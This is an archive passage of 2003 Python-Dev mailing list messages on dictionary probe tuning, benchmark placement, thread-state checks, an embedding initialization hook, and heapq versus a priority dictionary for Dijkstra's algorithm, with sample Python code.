From tim.one@comcast.net  Thu May  1 03:13:46 2003
From: tim.one@comcast.net (Tim Peters)
Date: Wed, 30 Apr 2003 22:13:46 -0400
Subject: [Python-Dev] Dictionary tuning
In-Reply-To: <001101c30f2a$216954a0$b1b3958d@oemcomputer>
Message-ID: <LNBBLJKPBEHFEDALKOLCMEJOEEAB.tim.one@comcast.net>

[Raymond Hettinger]
> ...
> I worked on similar approaches last month and found them wanting.
> The concept was that a 64byte cache line held 5.3 dict entries and
> that probing those was much less expensive than making a random
> probe into memory outside of the cache.
>
> The first thing I learned was that the random probes were necessary
> to reduce collisions.  Checking the adjacent space is like a single
> step of linear chaining, it increases the number of collisions.

Yes, I believe that any regularity will.

> That would be fine if the cost were offset by decreased memory
> access time; however, for small dicts, the whole dict is already
> in cache and having more collisions degrades performance
> with no compensating gain.
>
> The next bright idea was to have a separate lookup function for
> small dicts and for larger dictionaries.  I set the large dict lookup
> to search adjacent entries.  The good news is that an artificial
> test of big dicts showed a substantial improvement (around 25%).
> The bad news is that real programs were worse-off than before.

You should qualify that to "some real programs", or perhaps "all real
programs I've tried".  On the other side, I have real programs that access
large dicts in random order, so if you tossed those into your mix, a 25%
gain on those would more than wipe out the 1-2% losses you saw elsewhere.

> A day of investigation showed the cause.  The artificial test
> accessed keys randomly and showed the anticipated benefit. However,
> real programs access some keys more frequently than others
> (I believe Zipf's law applies.)

Some real programs do, and, for all I know, most real programs.  It's not
the case that all real programs do.  The counterexamples that sprang
instantly to my mind are those using dicts to accumulate stats for testing
random number generators.  Those have predictable access patterns only when
the RNG they're testing sucks <wink>.

> Those keys *and* their collision chains are likely already in the cache.
> So, big dicts had the same limitation as small dicts:  You always lose
> when you accept more collisions in return for exploiting cache locality.

Apart from that "always" ain't always so, I really like that as a summary!

> The conclusion was clear, the best way to gain performance
> was to have fewer collisions in the first place.  Hence, I
> resumed experiments on sparsification.

How many collisions are you seeing?  For int-keyed dicts, all experiments I
ran said Python's dicts collided less than a perfectly random hash table
would collide (the reason for that is explained in dictobject.c, and that
int-keyed dicts tend to use a contiguous range of ints as keys).

For string-keyed dicts, extensive experiments said collision behavior was
indistinguishable from a perfectly random hash table.

I never cared enough about other kinds of keys to time 'em, at least not
since systematic flaws were fixed in the tuple and float hash functions
(e.g., the tuple hash function used to xor the tuple's elements' hash codes,
so that all permututions of a given tuple had the same hash code; that's
necessary for unordered sets, but tuples are ordered).

>> If someone wants to experiment with that in lookdict_string(),
>> stick a new
>>
>>     ++i;
>>
>> before the for loop, and move the existing
>>
>> i = (i << 2) + i + perturb + 1;
>>
>> to the bottom of that loop.  Likewise for lookdict().

> PyStone gains 1%.
> PyBench loses a 1%.
> timecell gains 2%     (spreadsheet benchmark)
> timemat loses 2%     (pure python matrix package benchmark)
> timepuzzle loses 1% (class based graph traverser)

You'll forgive me if I'm skeptical:  they're such small differences that, if
I saw them, I'd consider them to be a wash -- in the noise.  What kind of
platform are you running on that has timing behavior repeatable enough to
believe 1-2% blips?

> P.S.  There is one other way to improve cache behavior
> but it involves touching code throughout dictobject.c.

Heh -- that wouldn't even be considered a minor nuisance to the truly
obsessed <wink>.

> Move the entry values into a separate array from the
> key/hash pairs.  That way, you get 8 entries per cache line.

What use case would that help?  You said before that small dicts are all in
cache anyway, so it wouldn't help those.  The jumps in large dicts are so
extreme that it doesn't seem to matter if the cache line size du jour holds
1 slot or 100.  To the contrary, at the end of the large dict lookup, it
sounds like it would incur an additional cache miss to fetch the value after
the key was found (since that value would no longer ever ride along with the
key and hashcode).

I can think of a different reason for considering this:  sets have no use
for the value slot, and wouldn't need to allocate space for 'em.

> P.P.S.  One other idea is to use a different search pattern
> for small dictionaries.  Store entries in a self-organizing list
> with no holes.  Dummy fields aren't needed which saves
> a test in the linear search loop.  When an entry is found,
> move it one closer to the head of the list so that the most
> common entries get found instantly.

I don't see how more than just one can be found instantly; if "instantly"
here means "in no more than a few tries", that's usually true of dicts
too -- but is still an odd meaning for "instantly" <wink>.

> Since there are no holes, all eight cells can be used instead of the
> current maximum of five.  Like the current arrangement, the
> whole small dict fits into just two cache lines.

Neil Schemenauer suggested that a few years ago, but I don't recall it going
anywhere.  I don't know how to predict for which apps it would be faster.
If people are keen to optimize very small search tables, think about schemes
that avoid the expense of hashing too.



From tim.one@comcast.net  Thu May  1 03:36:22 2003
From: tim.one@comcast.net (Tim Peters)
Date: Wed, 30 Apr 2003 22:36:22 -0400
Subject: [Python-Dev] Dictionary tuning
In-Reply-To: <002301c30f55$245394c0$125ffea9@oemcomputer>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEKAEEAB.tim.one@comcast.net>

[Raymond Hettinger]
> ...
> I'm going to write-up an informational PEP to summarize the
> results of research to-date.

I'd suggest instead a text file checked into the Object directory, akin to
the existing listsort.txt -- it's only of interest to the small fraction of
hardcore developers with an optimizing bent.

> After the first draft, I'm sure the other experimenters will each have
> lessons to share.  In addition, I'll attach a benchmarking suite and
> dictionary simulator (fully instrumented).  That way, future generations
> can reproduce the results and pickup where we left-off.

They probably won't, though.  The kind of people attracted to this kind of
micro-level fiddling revel in recreating this kind of stuff themselves.  For
example, you didn't look hard enough to find the sequence of dict simulators
Christian posted last time he got obsessed with this <wink>.  On the chance
that they might, a plain text file-- or a Wiki page! --is easier to update
than a PEP over time.

The benchmarking suite should also be checked in, and should be very
welcome.  Perhaps it's time for a "benchmark" subdirectory under Lib/test?
It doesn't make much sense even now that pystone and sortperf live directly
in the test directory.

> I've decided that this new process should have a name,
> something pithy, yet magical sounding, so it shall be
> dubbed SCIENCE.

LOL!  But I'm afraid it's not real science unless you first write grant
proposals, and pay a Big Name to agree to be named as Principal
Investigator.  I'll write Uncle Don a letter on your behalf <wink>.



From tim_one@email.msn.com  Thu May  1 04:50:32 2003
From: tim_one@email.msn.com (Tim Peters)
Date: Wed, 30 Apr 2003 23:50:32 -0400
Subject: [Python-Dev] New thread death in test_bsddb3
In-Reply-To: <y91ycusm.fsf@python.net>
Message-ID: <LNBBLJKPBEHFEDALKOLCMEIFEIAB.tim_one@email.msn.com>

[Thomas Heller]
> ...
> So is the policy now that it is no longer *allowed* to create another
> thread state, while in previous versions there wasn't any choice,
> because there existed no way to get the existing one?

You can still create all the thread states you like; the new check is in
PyThreadState_Swap(), not in PyThreadState_New().

There was always a choice, but previously Python provided no *help* in
keeping track of whether a thread already had a thread state associated with
it.  That didn't stop careful apps from providing their own mechanisms to do
so.

About policy, yes, it appears to be so now, else Mark wouldn't be raising a
fatal error <wink>.  I view it as having always been the policy (from a
good-faith reading of the previous code), just a policy that was too
expensive for Python to enforce.  There are many policies like that, such as
not passing goofy arguments to macros, and not letting references leak.
Python doesn't currently enforce them because it's currently too expensive
to enforce them.  Over time that can change.

> IMO a fatal error is very harsh, especially there's no problem to
> continue execution - excactly what happens in a release build.

There may or may not be a problem with continued execution -- if you've
associated more than one living thread state with a thread, your app may
very well be fatally confused in a way that's very difficult to diagnose
without this error.

Clearly, I like having fatal errors for dubious things in debug builds.
Debug builds are supposed to help you debug.  If the fatal error here drives
you insane, and you don't want to repair the app code, you're welcome to
change

#if defined(Py_DEBUG)

to

#if 0

in your debug build.

> Not that I am misunderstood: I very much appreciate the work Mark has
> done, and look forward to use it to it's fullest extent.

In what way is this error a genuine burden to you?  The only time I've seen
it trigger is in the Berkeley database wrapper, where it pointed out a fine
opportunity to simplify some obscure hand-rolled callback tomfoolery -- and
pointed out that the thread in question did in fact already have a thread
state.  Whether that was correct in all cases is something I don't know --
and don't have to worry about anymore, since the new code reuses the thread
state the thread already had.  The lack of errors in a debug run now assures
me that's in good shape now.



From drifty@alum.berkeley.edu  Thu May  1 05:38:39 2003
From: drifty@alum.berkeley.edu (Brett Cannon)
Date: Wed, 30 Apr 2003 21:38:39 -0700 (PDT)
Subject: [Python-Dev] Dictionary tuning
In-Reply-To: <LNBBLJKPBEHFEDALKOLCEEKAEEAB.tim.one@comcast.net>
References: <LNBBLJKPBEHFEDALKOLCEEKAEEAB.tim.one@comcast.net>
Message-ID: <Pine.SOL.4.55.0304302137050.26287@death.OCF.Berkeley.EDU>

[Tim Peters]

> The benchmarking suite should also be checked in, and should be very
> welcome.  Perhaps it's time for a "benchmark" subdirectory under Lib/test?
> It doesn't make much sense even now that pystone and sortperf live directly
> in the test directory.
>

Works for me.  Can we perhaps decide whether we want to do this in the
near future?  I am going to be writing up module docs for the test package
and if we are going to end up moving them I would like to be get this
written into the docs the first time through.

-Brett


From martin@v.loewis.de  Thu May  1 05:10:24 2003
From: martin@v.loewis.de (Martin v. =?iso-8859-15?q?L=F6wis?=)
Date: 01 May 2003 06:10:24 +0200
Subject: [Python-Dev] Initialization hook for extenders
In-Reply-To: <3EB04B03.887CDF7B@llnl.gov>
References: <3EB04B03.887CDF7B@llnl.gov>
Message-ID: <m3k7db5mtr.fsf@mira.informatik.hu-berlin.de>

"Patrick J. Miller" <patmiller@llnl.gov> writes:

> I actually want this to do some MPI initialization to setup a
> single user prompt with broadcast which has to run after
> Py_Initialize() but before the import of readline.

-1. It is easy enough to copy the code of Py_Main, and customize it
for special requirements. The next user may want to have a hook to put
additional command line options into Py_Main, YAGNI.

Regards,
Martin


From tim_one@email.msn.com  Thu May  1 07:13:51 2003
From: tim_one@email.msn.com (Tim Peters)
Date: Thu, 1 May 2003 02:13:51 -0400
Subject: [Python-Dev] Re: heaps
In-Reply-To: <eppstein-C9853A.16204924042003@main.gmane.org>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEINEIAB.tim_one@email.msn.com>

[Raymond Hettinger]
>> I'm quite pleased with the version already in CVS.  It is a small
>> masterpiece of exposition, sophistication, simplicity, and speed.
>> A class based interface is not necessary for every algorithm.

[David Eppstein]
> It has some elegance, but omits basic operations that are necessary for
> many heap-based algorithms and are not provided by this interface.

I think Raymond was telling you it isn't intended to be "an interface",
rather it's quite up-front about being a collection of functions that
operate directly on a Python list, implementing a heap in a very
straightforward way, and deliberately not trying to hide any of that.  IOW,
it's a concrete data type, not an abstract one.  I asked, and it doesn't
feel like apologizing for being what it is <wink>.

That's not to say Python couldn't benefit from providing an abstract heap
API too, and umpteen different implementations specialized to different
kinds of heap applications.  It is saying that heapq isn't trying to be
that, so pointing out that it isn't falls kinda flat.

> Specifically, the three algorithms that use heaps in my upper-division
> undergraduate algorithms classes are heapsort (for which heapq works
> fine, but you would generally want to use L.sort() instead), Dijkstra's
> algorithm (and its relatives such as A* and Prim), which needs the
> ability to decrease keys, and event-queue-based plane sweep algorithms
> (e.g. for finding all crossing pairs in a set of line segments) which
> need the ability to delete items from other than the top.

Then some of those will want a different implementation of a heap.  The
algorithms in heapq are still suitable for many heap applications, such as
maintaining an N-best list (like retaining only the 10 best-scoring items in
a long sequence), and A* on a search tree (when there's only one path to a
node, decrease-key isn't needed; A* on a graph is harder).

> To see how important the lack of these operations is, I decided to
> compare two implementations of Dijkstra's algorithm.

I don't think anyone claimed-- or would claim --that a heapq is suitable for
all heap purposes.

> The priority-dict implementation from
> http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/119466 takes as
> input a graph, coded as nested dicts {vertex: {neighbor: edge length}}.
> This is a variation of a graph coding suggested in one of Guido's essays
> that, as Raymond suggests, avoids using a separate class based interface.
>
> Here's a simplification of my dictionary-based Dijkstra implementation:
>
> def Dijkstra(G,start,end=None):
>     D = {}   # dictionary of final distances
>     P = {}   # dictionary of predecessors
>     Q = priorityDictionary()   # est.dist. of non-final vert.
>     Q[start] = 0
>     for v in Q:
>         D[v] = Q[v]
>         for w in G[v]:
>             vwLength = D[v] + G[v][w]
>             if w not in D and (w not in Q or vwLength < Q[w]):
>                 Q[w] = vwLength
>                 P[w] = v
>    return (D,P)
>
> Here's a translation of the same implementation to heapq (untested
> since I'm not running 2.3).  Since there is no decrease in heapq, nor
> any way to find and remove old keys,

A heapq *is* a list, so you could loop over the list to find an old object.
I wouldn't recommend that in general <wink>, but it's easy, and if the need
is rare then the advertised fact that a heapq is a plain list can be very
convenient.  Deleting an object from "the interior" still isn't supported
directly, of course.  It's possible to do so efficiently with this
implementation of a heap, but since it doesn't support an efficient way to
find an old object to begin with, there seemed little point to providing an
efficient delete-by-index function.  Here's one such:

import heapq

def delete_obj_at_index(heap, pos):
    lastelt = heap.pop()
    if pos >= len(heap):
        return

    # The rest is a lightly fiddled variant of heapq._siftup.
    endpos = len(heap)
    # Bubble up the smaller child until hitting a leaf.
    childpos = 2*pos + 1    # leftmost child position
    while childpos < endpos:
        # Set childpos to index of smaller child.
        rightpos = childpos + 1
        if rightpos < endpos and heap[rightpos] <= heap[childpos]:
            childpos = rightpos
        # Move the smaller child up.
        heap[pos] = heap[childpos]
        pos = childpos
        childpos = 2*pos + 1
    # The leaf at pos is empty now.  Put lastelt there, and and bubble
    # it up to its final resting place (by sifting its parents down).
    heap[pos] = lastelt
    heapq._siftdown(heap, 0, pos)

> I changed the algorithm to add new tuples for each new key, leaving the
> old tuples in place until they bubble up to the top of the heap.
>
> def Dijkstra(G,start,end=None):
>     D = {}   # dictionary of final distances
>     P = {}   # dictionary of predecessors
>     Q = [(0,None,start)]  # heap of (est.dist., pred., vert.)
>     while Q:
>         dist,pred,v = heappop(Q)
>         if v in D:
>             continue  # tuple outdated by decrease-key, ignore
>         D[v] = dist
>         P[v] = pred
>         for w in G[v]:
>             heappush(Q, (D[v] + G[v][w], v, w))
>     return (D,P)
>
> My analysis of the differences between the two implementations:
>
> - The heapq version is slightly complicated (the two lines
> if...continue) by the need to explicitly ignore tuples with outdated
> priorities.  This need for inserting low-level data structure
> maintenance code into higher-level algorithms is intrinsic to using
> heapq, since its data is not structured in a way that can support
> efficient decrease key operations.

It surprised me that you tried using heapq at all for this algorithm.  I was
also surprised that you succeeded <0.9 wink>.

> - Since the heap version had no way to determine when a new key was
> smaller than an old one, the heapq implementation needed two separate
> data structures to maintain predecessors (middle elements of tuples for
> items in queue, dictionary P for items already removed from queue).  In
> the dictionary implementation, both types of items stored their
> predecessors in P, so there was no need to transfer this information
> from one structure to another.
>
> - The dictionary version is slightly complicated by the need to look up
> old heap keys and compare them with the new ones instead of just
> blasting new tuples onto the heap.  So despite the more-flexible heap
> structure of the dictionary implementation, the overall code complexity
> of both implementations ends up being about the same.
>
> - Heapq forced me to build tuples of keys and items, while the
> dictionary based heap did not have the same object-creation overhead
> (unless it's hidden inside the creation of dictionary entries).

Rest easy, it's not.

> On the other hand, since I was already building tuples, it was
> convenient to also store predecessors in them instead of in some
> other structure.
>
> - The heapq version uses significantly more storage than the dictionary:
> proportional to the number of edges instead of the number of vertices.
>
> - The changes I made to Dijkstra's algorithm in order to use heapq might
> not have been obvious to a non-expert; more generally I think this lack
> of flexibility would make it more difficult to use heapq for
> cookbook-type implementation of textbook algorithms.

Depends on the specific algorithms in question, of course.  No single heap
implementation is the best choice for all algorithms, and heapq would be
misleading people if, e.g., it did offer a decrease_key function -- it
doesn't support an efficient way to do that, and it doesn't pretend to.

> - In Dijkstra's algorithm, it was easy to identify and ignore outdated
> heap entries, sidestepping the inability to decrease keys.  I'm not
> convinced that this would be as easy in other applications of heaps.

All that is explaining why this specific implementation of a heap isn't
suited to the task at hand.  I don't believe that was at issue, though.  An
implementation of a heap that is suited for this task may well be less
suited for other tasks.

> - One of the reasons to separate data structures from the algorithms
> that use them is that the data structures can be replaced by ones with
> equivalent behavior, without changing any of the algorithm code.  The
> heapq Dijkstra implementation is forced to include code based on the
> internal details of heapq (specifically, the line initializing the heap
> to be a one element list), making it less flexible for some uses.
> The usual reason one might want to replace a data structure is for
> efficiency, but there are others: for instance, I teach various
> algorithms classes and might want to use an implementation of Dijkstra's
> algorithm as a testbed for learning about different priority queue data
> structures.  I could do that with the dictionary-based implementation
> (since it shows nothing of the heap details) but not the heapq one.

You can wrap any interface you like around heapq (that's very easy to do in
Python), but it won't change that heapq's implementation is poorly suited to
this application.  priorityDictionary looks like an especially nice API for
this specific algorithm, but, e.g., impossible to use directly for
maintaining an N-best queue (priorityDictionary doesn't support multiple
values with the same priority, right?  if we're trying to find the 10,000
poorest people in America, counting only one as dead broke would be too
Republican for some peoples' tastes <wink>).  OTOH, heapq is easy and
efficient for *that* class of heap application.

> Overall, while heapq was usable for implementing Dijkstra, I think it
> has significant shortcomings that could be avoided by a more
> well-thought-out interface that provided a little more functionality and
> a little clearer separation between interface and implementation.

heapq isn't trying to separate them at all -- quite the contrary!  It's much
like the bisect module that way.  They find very good uses in practice.

I should note that I objected to heapq at the start, because there are
several important heap implementation techniques, and just one doesn't fit
anyone all the time.  My objection went away when Guido pointed out how much
like bisect it is:  since it doesn't pretend one whit to generality or
opaqueness, it can't be taken as promising more than it actually does, nor
can it interfere with someone (so inclined) defining a general heap API:
it's not even a class, just a handful of functions.  Useful, too, just as it
is.  A general heap API would be nice, but it wouldn't have much (possibly
nothing) to do with heapq.



From eppstein@ics.uci.edu  Thu May  1 07:36:17 2003
From: eppstein@ics.uci.edu (David Eppstein)
Date: Wed, 30 Apr 2003 23:36:17 -0700
Subject: [Python-Dev] Re: heaps
In-Reply-To: <LNBBLJKPBEHFEDALKOLCEEINEIAB.tim_one@email.msn.com>
References: <LNBBLJKPBEHFEDALKOLCEEINEIAB.tim_one@email.msn.com>
Message-ID: <5841710.1051745776@[10.0.1.2]>

On 5/1/03 2:13 AM -0400 Tim Peters <tim_one@email.msn.com> wrote:
> It surprised me that you tried using heapq at all for this algorithm.  I
> was also surprised that you succeeded <0.9 wink>.

Wink noted, but it surprised me too, a little.  I had thought decrease key 
was a necessary part of the algorithm, not something that could be finessed 
like that.

> You can wrap any interface you like around heapq (that's very easy to do
> in Python), but it won't change that heapq's implementation is poorly
> suited to this application.  priorityDictionary looks like an especially
> nice API for this specific algorithm, but, e.g., impossible to use
> directly for maintaining an N-best queue (priorityDictionary doesn't
> support multiple values with the same priority, right?  if we're trying
> to find the 10,000 poorest people in America, counting only one as dead
> broke would be too Republican for some peoples' tastes <wink>).  OTOH,
> heapq is easy and efficient for *that* class of heap application.

I agree with your main points (heapq's inability to handle certain priority 
queue applications doesn't mean it's useless, and its 
implementation-specific API helps avoid fooling programmers into thinking 
it's any more than what it is).  But I am confused at this example.  Surely 
it's just as easy to store (income,identity) tuples in either data 
structure.

If you mean, you want to find the 10k smallest income values (rather than 
the people having those incomes), then it may be that a better data 
structure would be a simple list L in which the value of L[i] is the count 
of people with income i.

-- 
David Eppstein                      http://www.ics.uci.edu/~eppstein/
Univ. of California, Irvine, School of Information & Computer Science



From guido@python.org  Thu May  1 14:28:24 2003
From: guido@python.org (Guido van Rossum)
Date: Thu, 01 May 2003 09:28:24 -0400
Subject: [Python-Dev] Dictionary tuning
In-Reply-To: Your message of "Wed, 30 Apr 2003 21:38:39 PDT."
 <Pine.SOL.4.55.0304302137050.26287@death.OCF.Berkeley.EDU>
References: <LNBBLJKPBEHFEDALKOLCEEKAEEAB.tim.one@comcast.net>
 <Pine.SOL.4.55.0304302137050.26287@death.OCF.Berkeley.EDU>
Message-ID: <200305011328.h41DSPq05585@odiug.zope.com>

[Tim]
> > The benchmarking suite should also be checked in, and should be
> > very welcome.  Perhaps it's time for a "benchmark" subdirectory
> > under Lib/test?  It doesn't make much sense even now that pystone
> > and sortperf live directly in the test directory.

> Works for me.  Can we perhaps decide whether we want to do this in the
> near future?  I am going to be writing up module docs for the test package
> and if we are going to end up moving them I would like to be get this
> written into the docs the first time through.
> 
> -Brett

Should the benchmarks directory be part of the distribution, or should
it be in the nondist part of the CVS tree?

--Guido van Rossum (home page: http://www.python.org/~guido/)


From mwh@python.net  Thu May  1 15:07:37 2003
From: mwh@python.net (Michael Hudson)
Date: Thu, 01 May 2003 15:07:37 +0100
Subject: [Python-Dev] Dictionary tuning
In-Reply-To: <200305011328.h41DSPq05585@odiug.zope.com> (Guido van Rossum's
 message of "Thu, 01 May 2003 09:28:24 -0400")
References: <LNBBLJKPBEHFEDALKOLCEEKAEEAB.tim.one@comcast.net>
 <Pine.SOL.4.55.0304302137050.26287@death.OCF.Berkeley.EDU>
 <200305011328.h41DSPq05585@odiug.zope.com>
Message-ID: <2m65ouahg6.fsf@starship.python.net>

Guido van Rossum <guido@python.org> writes:

> [Tim]
>> > The benchmarking suite should also be checked in, and should be
>> > very welcome.  Perhaps it's time for a "benchmark" subdirectory
>> > under Lib/test?  It doesn't make much sense even now that pystone
>> > and sortperf live directly in the test directory.
>
>> Works for me.  Can we perhaps decide whether we want to do this in the
>> near future?  I am going to be writing up module docs for the test package
>> and if we are going to end up moving them I would like to be get this
>> written into the docs the first time through.
>> 
>> -Brett
>
> Should the benchmarks directory be part of the distribution, or should
> it be in the nondist part of the CVS tree?

I can't think why you'd want it in nondist, unless they depend on huge
input files or something.

Cheers,
M.

-- 
  Those who have deviant punctuation desires should take care of their
  own perverted needs.                  -- Erik Naggum, comp.lang.lisp


From guido@python.org  Thu May  1 15:18:50 2003
From: guido@python.org (Guido van Rossum)
Date: Thu, 01 May 2003 10:18:50 -0400
Subject: [Python-Dev] Dictionary tuning
In-Reply-To: Your message of "Thu, 01 May 2003 15:07:37 BST."
 <2m65ouahg6.fsf@starship.python.net>
References: <LNBBLJKPBEHFEDALKOLCEEKAEEAB.tim.one@comcast.net> <Pine.SOL.4.55.0304302137050.26287@death.OCF.Berkeley.EDU> <200305011328.h41DSPq05585@odiug.zope.com>
 <2m65ouahg6.fsf@starship.python.net>
Message-ID: <200305011418.h41EIoF07682@odiug.zope.com>

> > Should the benchmarks directory be part of the distribution, or should
> > it be in the nondist part of the CVS tree?
> 
> I can't think why you'd want it in nondist, unless they depend on huge
> input files or something.

OK.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From aahz@pythoncraft.com  Thu May  1 15:20:35 2003
From: aahz@pythoncraft.com (Aahz)
Date: Thu, 1 May 2003 10:20:35 -0400
Subject: [Python-Dev] Dictionary tuning
In-Reply-To: <200305011328.h41DSPq05585@odiug.zope.com>
References: <LNBBLJKPBEHFEDALKOLCEEKAEEAB.tim.one@comcast.net> <Pine.SOL.4.55.0304302137050.26287@death.OCF.Berkeley.EDU> <200305011328.h41DSPq05585@odiug.zope.com>
Message-ID: <20030501142034.GA28364@panix.com>

On Thu, May 01, 2003, Guido van Rossum wrote:
>
> Should the benchmarks directory be part of the distribution, or should
> it be in the nondist part of the CVS tree?

Given the constant number of arguments in c.l.py about speed, I'd keep
it in the distribution unless/until it gets large.
-- 
Aahz (aahz@pythoncraft.com)           <*>         http://www.pythoncraft.com/

"In many ways, it's a dull language, borrowing solid old concepts from
many other languages & styles:  boring syntax, unsurprising semantics,
few automatic coercions, etc etc.  But that's one of the things I like
about it."  --Tim Peters on Python, 16 Sep 93


From tjreedy@udel.edu  Thu May  1 16:27:34 2003
From: tjreedy@udel.edu (Terry Reedy)
Date: Thu, 1 May 2003 11:27:34 -0400
Subject: [Python-Dev] Re: Dictionary tuning
References: <LNBBLJKPBEHFEDALKOLCEEKAEEAB.tim.one@comcast.net><Pine.SOL.4.55.0304302137050.26287@death.OCF.Berkeley.EDU><200305011328.h41DSPq05585@odiug.zope.com> <2m65ouahg6.fsf@starship.python.net>
Message-ID: <b8re5u$82t$1@main.gmane.org>

>From my curious user viewpoint ...

"Michael Hudson" <mwh@python.net> wrote in message
news:2m65ouahg6.fsf@starship.python.net...
> Guido van Rossum <guido@python.org> writes:
>
> > [Tim]
> >> > The benchmarking suite should also be checked in, and should be
> >> > very welcome.  Perhaps it's time for a "benchmark" subdirectory
> >> > under Lib/test?  It doesn't make much sense even now that
pystone
> >> > and sortperf live directly in the test directory.

+ 1 on a separate subdirectory (there are two other already) to make
these easier to find (or ignore).

> >> Works for me.  Can we perhaps decide whether we want to do this
in the
> >> near future?  I am going to be writing up module docs for the
test package
> >> and if we are going to end up moving them I would like to be get
this
> >> written into the docs the first time through.

+ 1 on doing so by 2.3 final if not before

> > Should the benchmarks directory be part of the distribution, or
should
> > it be in the nondist part of the CVS tree?
>
> I can't think why you'd want it in nondist, unless they depend on
huge
> input files or something.

+ 1 on keeping these with the standard distribution.  Sortperf.py is a
great example of random + systematic corner case testing extended to
something more complicated than binary ops.  Besides that, I expect to
actually use it, with minor mods, sometime later this year.  I am more
than happy to give it the 4K bytes it uses.

Terry J. Reedy





From patmiller@llnl.gov  Thu May  1 16:23:07 2003
From: patmiller@llnl.gov (Patrick J. Miller)
Date: Thu, 01 May 2003 08:23:07 -0700
Subject: [Python-Dev] Initialization hook for extenders
References: <3EB04B03.887CDF7B@llnl.gov> <m3k7db5mtr.fsf@mira.informatik.hu-berlin.de>
Message-ID: <3EB13BDB.808E749@llnl.gov>

"Martin v. L=F6wis" wrote:
> -1. It is easy enough to copy the code of Py_Main, and customize it
> for special requirements. The next user may want to have a hook to put
> additional command line options into Py_Main, YAGNI.

It's not easy.

Not if you simply want to link against an installed Python.

Nor so if you want to build against 2.1 2.2 and 2.3 ... libraries.

There are subtle changes that bite you in the ass if you don't
physically copy the right source forward.

We did copy forward main.c, but found that every time we updated
Python, we had to "rehack" main to make sure we had all the options
and flags and initialization straight.

I think the hook is extremely cheap, very short, looks almost exactly
like Py_AtExit() and solves the problem directly.

Pat



--=20
Patrick Miller | (925) 423-0309 |
http://www.llnl.gov/CASC/people/pmiller

You can discover more about a person in an hour of play than in a year
of
discussion. -- Plato, philosopher (427-347 BCE)


From glyph@twistedmatrix.com  Thu May  1 16:59:41 2003
From: glyph@twistedmatrix.com (Glyph Lefkowitz)
Date: Thu, 1 May 2003 10:59:41 -0500
Subject: [Python-Dev] Re: Python-Dev digest, Vol 1 #3221 - 4 msgs
In-Reply-To: <200304282102.h3SL2rW18842@odiug.zope.com>
Message-ID: <EB0B6712-7BED-11D7-B27C-000393C9700E@twistedmatrix.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On Monday, April 28, 2003, at 04:02 PM, Guido van Rossum wrote:

>> Why is the Python development team introducing bugs into Python and
>> then expecting the user community to fix things that used to work?
>
> I resent your rhetoric, Glyph.  Had you read the rest of this thread,
> you would have seen that the performance regression only happens for
> sending data at maximum speed over the loopback device, and is
> negligeable when receiving e.g. data over a LAN.  You would also have
> seen that I have already suggested two different simple fixes.

I apologize.  I did not seriously mean this as an indictment of the 
entire Python development team or process.  I would have responded to 
this effect sooner, but I've been swamped with work.

>> I could understand not wanting to put a lot of effort into
>> correcting obscure or difficult-to-find performance problems that
>> only a few people care about, but the obvious thing to do in this
>> case is simply to change the default behavior.
>
> It can and will be fixed.  I just don't have the time to fix it
> myself.

I noticed your comment about the checkin.  Thanks to the dev team for 
fixing it so promptly.

>> I think this should be in the release notes for 2.3.  "Python is 10%
>> faster, unless you use sockets, in which case it is much, much slower.
>> Do the following in order to regain lost performance and retain the
>> same semantics:"
>
> That is total bullshit, Glyph, and you know it.

Please pardon the exaggeration.  I forget that sarcasm does not come 
across as well on e-mail as it does on IRC.  I appreciate that the 
performance drop wasn't really that serious.

On a more positive note, looking at performance numbers got us thinking 
about increasing performance in Twisted.  Anthony Baxter has been very 
helpful with profiling information, Itamar's already written some 
benchmarking tests, and I finished up a logging infrastructure that is 
more amenable to metrics gathering last night.  (It's also less 
completely awful than the one we had before and should hook up to the 
new logging.py gracefully.)

We already have an always-on multi-platform regression test suite for 
Twisted (not the snake farm):

	http://www.twistedmatrix.com/users/warner.twistd/

If we get this reporting some performance numbers as well, it would be 
pretty easy to turn it into a regression/performance test for Python by 
tweaking a few variables -- probably, just 'cvs update; make' in the 
Python directory instead of the Twisted one.  Is there interest in 
seeing these kinds of numbers generated regularly?  What kind of 
numbers would be interesting on the Python side?
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (Darwin)

iD8DBQE+sUSIvVGR4uSOE2wRAmJDAJ9dRfcX8zPYUvExUtvpxTpQlg2GhwCfde5B
C7bsGc8YSwp5aN1vJ6BSiGU=
=/c5y
-----END PGP SIGNATURE-----



From martin@v.loewis.de  Thu May  1 16:46:05 2003
From: martin@v.loewis.de (=?ISO-8859-1?Q?=22Martin_v=2E_L=F6wis=22?=)
Date: Thu, 01 May 2003 17:46:05 +0200
Subject: [Python-Dev] Initialization hook for extenders
In-Reply-To: <3EB13BDB.808E749@llnl.gov>
References: <3EB04B03.887CDF7B@llnl.gov> <m3k7db5mtr.fsf@mira.informatik.hu-berlin.de> <3EB13BDB.808E749@llnl.gov>
Message-ID: <3EB1413D.7080604@v.loewis.de>

Patrick J. Miller wrote:

> It's not easy.
> 
> Not if you simply want to link against an installed Python.

Why not? Just don't call the function Py_Main.

> Nor so if you want to build against 2.1 2.2 and 2.3 ... libraries.

Again, I can't see a reason why that is.

> There are subtle changes that bite you in the ass if you don't
> physically copy the right source forward.

For example?

> We did copy forward main.c, but found that every time we updated
> Python, we had to "rehack" main to make sure we had all the options
> and flags and initialization straight.

That is not necessary. What would be the problem if you just left
your function as it was in Python 2.1?

> I think the hook is extremely cheap, very short, looks almost exactly
> like Py_AtExit() and solves the problem directly.

Unfortunately, the problem is one that almost nobody ever has, and 
supporting that API adds a maintenance burden. It is better if the
maintenance burden is on your side than on the Python core.

If you think you really need this, write a PEP, ask the community, and 
wait for BDFL pronouncement. I'm still -1.

Regards,
Martin




From patmiller@llnl.gov  Thu May  1 17:15:09 2003
From: patmiller@llnl.gov (Patrick J. Miller)
Date: Thu, 01 May 2003 09:15:09 -0700
Subject: [Python-Dev] Initialization hook for extenders
References: <3EB04B03.887CDF7B@llnl.gov> <m3k7db5mtr.fsf@mira.informatik.hu-berlin.de> <3EB13BDB.808E749@llnl.gov> <3EB1413D.7080604@v.loewis.de>
Message-ID: <3EB1480D.EE379EC6@llnl.gov>

Martin,

Sorry you disagree.  I think that the issue is still important and
other pieces of the API are already in this direction.

For instance, there is no need to have PyImport_AppendInittab
